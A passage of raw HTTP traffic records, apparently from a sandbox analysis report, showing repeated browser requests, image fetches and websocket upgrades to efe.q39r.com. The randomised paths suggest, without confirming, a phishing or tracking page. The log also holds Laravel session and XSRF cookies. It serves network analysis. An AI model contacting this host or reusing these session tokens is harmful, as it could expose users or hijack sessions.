https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /qrLAnsLIQYwNSdAtFLDZAVDTqAL5avHc3AjdCSMdpstcHKxHSNTwj5RyHAtXh530miRlbef231 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvNTmYhBjmYRofOqCut3dZa4UstUasUJN1P0bM12122 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efVNIXESSrQw6BIj3MhA1KKgkluoFJllnuG6p4XxyrMQmt6p78145 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /stKeukEOXpk08d7sqAz7M1lBesvLMPeWkhZORrTev6DvovqmnrlQNU4MGnNhzR0tmqV9LI6Xjgh260 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzLzEv86HZWOuTs43gD6XgopoPEM7xE25vteTrcz90175 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klInHvOHos9aWrFFUZMeefGPqwxhIrivj5FxETTv56170 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /opowUdIRVvkQBTpz9zU3kvicjS7Vd758jghSE2WOx04K5tpqvy3hO3cd194 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /qrLAnsLIQYwNSdAtFLDZAVDTqAL5avHc3AjdCSMdpstcHKxHSNTwj5RyHAtXh530miRlbef231 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ghNptpEXYJR7LTcZ65tUkEWP4OmnFHYdEppOMq56CTaQuzPVKMBnXiF5yqRi12209 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /stKeukEOXpk08d7sqAz7M1lBesvLMPeWkhZORrTev6DvovqmnrlQNU4MGnNhzR0tmqV9LI6Xjgh260 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3DSec-WebSocket-Key: tzfmYUPdQmK+qu6l0b7llA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic HTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3DSec-WebSocket-Key: Smb8hrSIatAqbCOX5uL6+w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic HTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3DSec-WebSocket-Key: MN18zzkZIKmD5VQMEYHEyw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic HTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; 